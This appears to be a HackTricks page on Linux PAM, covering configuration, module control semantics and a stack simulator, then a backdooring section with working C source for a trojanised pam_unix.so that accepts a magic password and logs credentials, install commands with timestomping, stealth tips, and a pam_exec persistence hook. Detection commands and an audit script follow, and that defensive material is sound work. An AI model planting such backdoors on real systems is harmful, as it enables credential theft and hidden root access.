PAM - Pluggable Authentication Modules
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
PAM (Pluggable Authentication Modules) acts as a security mechanism that verifies the identity of users trying to access computer services, controlling their access according to various criteria. It works like a digital gatekeeper, ensuring that only authorized users can use specific services while also imposing usage limits to prevent overloading the system.
Configuration Files
- Solaris and UNIX-based systems typically use a central configuration file located at /etc/pam.conf.
- Linux systems prefer a directory approach, storing service-specific configurations inside /etc/pam.d. For example, the configuration file for the login service is located at /etc/pam.d/login.
An example PAM configuration for the login service might look like this:
```
auth required /lib/security/pam_securetty.so
auth required /lib/security/pam_nologin.so
auth sufficient /lib/security/pam_ldap.so
auth required /lib/security/pam_unix_auth.so try_first_pass
account sufficient /lib/security/pam_ldap.so
account required /lib/security/pam_unix_acct.so
password required /lib/security/pam_cracklib.so
password required /lib/security/pam_ldap.so
password required /lib/security/pam_pwdb.so use_first_pass
session required /lib/security/pam_unix_session.so
```
PAM Management Realms
These realms, or management groups, are auth, account, password, and session, each with a distinct role in the authentication and session management process:
- Auth: Verifies the user's identity, usually by prompting for a password.
- Account: Handles account verification, checking conditions such as group membership or time-based restrictions.
- Password: Manages password updates, including complexity checks or prevention of dictionary attacks.
- Session: Manages actions at the start or end of a service session, such as mounting directories or setting resource limits.
PAM Module Controls
Controls determine how a module responds to success or failure, which affects the overall authentication process. They are:
- Required: Failure of a required module leads to eventual failure, but only after all subsequent modules have been checked.
- Requisite: Terminates the process immediately on failure.
- Sufficient: Success bypasses the checks of the remaining modules in that realm unless a subsequent module fails.
- Optional: Leads to failure only if it is the sole module in the stack.
Context Example
In a setup with multiple auth modules, the process follows a strict order. If the pam_securetty module finds the login terminal unauthorized, root logins are blocked, but all modules are still processed because of its "required" status. pam_env sets environment variables, which can improve the user experience. The pam_ldap and pam_unix modules work together to authenticate the user, with pam_unix attempting to reuse a previously supplied password, adding efficiency and flexibility to the authentication methods.
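The stack simulator below is an added example and is not code from the page. It parses the login stack shown above and, given each module's outcome, reports which modules actually run and the final verdict, following the semantics documented in pam.conf(5): a required failure is remembered while later modules still run, a requisite failure returns at once, a sufficient success ends the stack only if no required module has failed earlier, and an optional result only counts when nothing else decided. The module outcomes passed in are constructed scenarios.

```python
"""Simulate Linux-PAM stack evaluation for the four control keywords.

Added example (not code from the page): parse a pam.conf-style stack and,
given each module's outcome, report which modules run and the final verdict.
"""
from dataclasses import dataclass, field
from os.path import basename

# Constructed stack: the login example shown earlier on the page.
SAMPLE_LOGIN_STACK = """\
auth    required   /lib/security/pam_securetty.so
auth    required   /lib/security/pam_nologin.so
auth    sufficient /lib/security/pam_ldap.so
auth    required   /lib/security/pam_unix_auth.so try_first_pass
account sufficient /lib/security/pam_ldap.so
account required   /lib/security/pam_unix_acct.so
"""


@dataclass
class Entry:
    realm: str                     # auth | account | password | session
    control: str                   # required | requisite | sufficient | optional
    module: str                    # file name of the .so, directory stripped
    args: tuple = field(default_factory=tuple)


def parse_stack(text):
    """Parse pam.conf / pam.d lines into Entry objects (comments and blanks skipped)."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        realm, control, module, *args = line.split()
        entries.append(Entry(realm, control.lower(), basename(module), tuple(args)))
    return entries


def evaluate(entries, outcomes, realm="auth"):
    """Return ("success" | "failure", [modules invoked, in order]) for one realm.

    outcomes maps module file name -> True (PAM_SUCCESS) or False (any error).
    A module missing from outcomes counts as failing, which is also what PAM
    does when a module cannot be loaded.
    """
    invoked = []
    impression = None   # None = undecided, True = positive, False = negative
    for e in entries:
        if e.realm != realm:
            continue
        invoked.append(e.module)
        ok = outcomes.get(e.module, False)
        if e.control == "required":
            if ok:
                impression = True if impression is None else impression
            else:
                impression = False            # remembered; the stack continues
        elif e.control == "requisite":
            if not ok:
                return "failure", invoked     # abort right here
            impression = True if impression is None else impression
        elif e.control == "sufficient":
            if ok and impression is not False:
                return "success", invoked     # short-circuit the rest of the realm
            # a failing sufficient module is simply ignored
        elif e.control == "optional":
            if ok and impression is None:
                impression = True             # only matters if nothing else decides
        else:
            raise ValueError(f"unsupported control keyword: {e.control}")
    return ("success" if impression else "failure"), invoked


if __name__ == "__main__":
    stack = parse_stack(SAMPLE_LOGIN_STACK)
    all_ok = {m: True for m in ("pam_securetty.so", "pam_nologin.so",
                                "pam_ldap.so", "pam_unix_auth.so")}
    print("everything passes      :", evaluate(stack, all_ok))
    print("root on unlisted tty   :", evaluate(stack, {**all_ok, "pam_securetty.so": False}))
    print("LDAP down, local login :", evaluate(stack, {**all_ok, "pam_ldap.so": False}))
```

Running the three scenarios shows the behaviour the text describes: with pam_securetty failing, all four auth modules are still invoked before the stack reports failure, and a successful pam_ldap no longer short-circuits the stack because a required module has already failed.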
Backdooring PAM – Hooking pam_unix.so
A classic persistence trick in high-value Linux environments is to swap the legitimate PAM library with a trojanised drop-in. Because every SSH / console login ends up calling pam_unix.so:pam_sm_authenticate(), a few lines of C are enough to capture credentials or implement a magic-password bypass.
Build Overview
Example `pam_unix.so` trojan
```c
#define _GNU_SOURCE
#include <security/pam_modules.h>
#include <security/pam_ext.h>
#include <dlfcn.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

static int (*orig)(pam_handle_t *, int, int, const char **);
static const char *MAGIC = "Sup3rS3cret!";

int pam_sm_authenticate(pam_handle_t *pamh, int flags, int argc, const char **argv)
{
    const char *user, *pass;
    pam_get_user(pamh, &user, NULL);
    pam_get_authtok(pamh, PAM_AUTHTOK, &pass, NULL);

    /* Magic pwd → immediate success */
    if (pass && strcmp(pass, MAGIC) == 0)
        return PAM_SUCCESS;

    /* Credential harvesting */
    int fd = open("/usr/bin/.dbus.log", O_WRONLY | O_APPEND | O_CREAT, 0600);
    dprintf(fd, "%s:%s\n", user, pass);
    close(fd);

    /* Fall back to original function */
    if (!orig) {
        orig = dlsym(RTLD_NEXT, "pam_sm_authenticate");
    }
    return orig(pamh, flags, argc, argv);
}
```
Compile and stealth-replace:
```bash
gcc -fPIC -shared -o pam_unix.so trojan_pam.c -ldl -lpam
mv /lib/security/pam_unix.so /lib/security/pam_unix.so.bak
mv pam_unix.so /lib/security/pam_unix.so
chmod 644 /lib/security/pam_unix.so # keep original perms
touch -r /bin/ls /lib/security/pam_unix.so # timestomp
```
OpSec Tips
- Atomic overwrite – write to a temporary file and then `mv` it into place, to avoid half-written libraries that can lock you out of SSH.
- Placing log files such as /usr/bin/.dbus.log hides them among legitimate desktop artefacts.
- Keep the symbol exports consistent (pam_sm_setcred, etc.) to avoid incorrect PAM behaviour.
Detection
- Compare the MD5/SHA256 of pam_unix.so against the distro package. `rpm -V pam` or `debsums -s libpam-modules` detect modified libraries without manual hashing.
- Check for world-writable files or unusual ownership under /lib/security/.
- auditd rule: `-w /lib/security/pam_unix.so -p wa -k pam-backdoor`.
- Grep the PAM configuration for unexpected modules: `grep -R "pam_[a-z].*\.so" /etc/pam.d/ | grep -v pam_unix`.
Quick triage commands (post-compromise or threat hunting)
```bash
# 1) Spot alien PAM objects
find /{lib,usr/lib,usr/local/lib}{,64}/security -type f -printf '%p %s %M %u:%g %TY-%Tm-%Td\n' | grep -E 'pam_|libselinux'
# 2) Verify package integrity
command -v rpm >/dev/null && rpm -V pam || debsums -s libpam-modules
# 3) Identify non-packaged PAM modules
for f in /{lib,usr/lib,usr/local/lib}{,64}/security/*.so; do
dpkg -S "$f" >/dev/null 2>&1 || echo "UNPACKAGED: $f";
done
# 4) Look for stealth config edits
grep -R "pam_.*\.so" /etc/pam.d/ | grep -E 'plg|selinux|custom|exec'
```
Abusing pam_exec for persistence
Instead of replacing pam_unix.so, a lighter-weight approach is to add a pam_exec line to /etc/pam.d/sshd so that every SSH login launches an implant while leaving the normal stack untouched:
```
# Prepend to /etc/pam.d/sshd
session optional pam_exec.so quiet /usr/local/bin/.ssh_hook.sh
```
pam_exec runs as root inside sshd's PAM context, so the script can drop reverse shells, collect env vars, or re-open implanted sockets without any filesystem changes to the core libraries.
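The audit script below is an added example, not code from the page, and pulls together the Detection, triage and pam_exec sections above into one offline check. It parses pam.d-style text (including `@include` lines and `[success=1 default=ignore]` bracket controls), flags pam_exec entries together with the program they run, modules referenced from outside the standard module directories, and modules missing from a known-good inventory (a constructed stand-in for what `dpkg -S` / `rpm -qf` would report), and compares a module file's SHA-256 against an expected digest. The sample sshd config, the directory and module lists, and the digests are all constructed for the example.

```python
"""Audit PAM configuration text for the indicators discussed on this page.

Added example, not code from the page: flags pam_exec entries, modules loaded
from non-standard directories, modules absent from a known-good inventory, and
module files whose SHA-256 does not match an expected digest.
"""
import hashlib
import os
import re
import tempfile
from os.path import basename, dirname

# Assumption: where distro packages install PAM modules (Debian multiarch and
# RHEL lib64 layouts); adjust for your distribution.
STANDARD_MODULE_DIRS = {"/lib/security", "/lib64/security", "/usr/lib/security",
                        "/usr/lib64/security", "/usr/lib/x86_64-linux-gnu/security"}

# Constructed known-good inventory: module files the package manager reports
# as owned by the distro's PAM packages.
KNOWN_GOOD_MODULES = {"pam_unix.so", "pam_securetty.so", "pam_nologin.so",
                      "pam_env.so", "pam_permit.so", "pam_deny.so", "pam_limits.so",
                      "pam_loginuid.so", "pam_keyinit.so", "pam_exec.so", "pam_ldap.so"}

# Constructed /etc/pam.d/sshd: the pam_exec persistence line from the text
# plus an unpackaged module loaded from /usr/local.
SAMPLE_SSHD_CONFIG = """\
# PAM configuration for the Secure Shell service (constructed sample)
session optional pam_exec.so quiet /usr/local/bin/.ssh_hook.sh
@include common-auth
auth     required  pam_nologin.so
account  required  pam_nologin.so
auth     [success=1 default=ignore] pam_unix.so nullok
auth     requisite pam_deny.so
auth     required  pam_permit.so
session  required  pam_loginuid.so
session  optional  pam_keyinit.so force revoke
session  required  /usr/local/lib/security/pam_custom.so
session  required  pam_limits.so
"""

# realm, control (plain keyword or [bracketed action list]), module, optional args
LINE_RE = re.compile(r"^(\S+)\s+(\[[^\]]*\]|\S+)\s+(\S+)\s*(.*)$")


def parse_pam_lines(text):
    """Yield (lineno, realm, control, module, args) per directive line; comments,
    blanks and @include are skipped; a leading '-' on the realm is dropped."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("@include"):
            continue
        m = LINE_RE.match(line)
        if not m:
            continue
        realm, control, module, args = m.groups()
        yield lineno, realm.lstrip("-"), control, module, args.split()


def audit_pam_config(text, known_good=KNOWN_GOOD_MODULES):
    """Return a list of (lineno, kind, detail) findings for one config file."""
    findings = []
    for lineno, realm, control, module, args in parse_pam_lines(text):
        name = basename(module)
        if name == "pam_exec.so":
            program = next((a for a in args if a.startswith("/")), "<none>")
            findings.append((lineno, "pam_exec",
                             f"{realm} stack runs external program {program}"))
        if module.startswith("/") and dirname(module) not in STANDARD_MODULE_DIRS:
            findings.append((lineno, "nonstandard-path",
                             f"{module} is loaded from outside the standard module dirs"))
        if name not in known_good:
            findings.append((lineno, "unknown-module",
                             f"{name} is not in the known-good inventory"))
    return findings


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def module_matches_baseline(path, expected_sha256):
    """True if the file's SHA-256 equals the digest recorded from a clean install
    or the distro package; False means the module on disk was modified."""
    return sha256_of(path) == expected_sha256.lower()


def hash_check_demo():
    """Constructed demo: a fake module file checked against its real digest and
    a bogus one. Returns (matches_good_digest, matches_bogus_digest)."""
    payload = b"constructed stand-in for pam_unix.so bytes"
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "pam_unix.so")
        with open(path, "wb") as f:
            f.write(payload)
        good = hashlib.sha256(payload).hexdigest()
        return module_matches_baseline(path, good), module_matches_baseline(path, "0" * 64)


if __name__ == "__main__":
    for lineno, kind, detail in audit_pam_config(SAMPLE_SSHD_CONFIG):
        print(f"line {lineno:>2}  {kind:<16} {detail}")
    print("hash check (good, bogus):", hash_check_demo())
```

On a real host, feed each file under /etc/pam.d/ to `audit_pam_config` and build `known_good` from the package manager's file ownership output rather than the constructed set; the pam_exec finding is the one to read first, since the page's persistence variant needs no change to the module files at all and so escapes the hash and package checks.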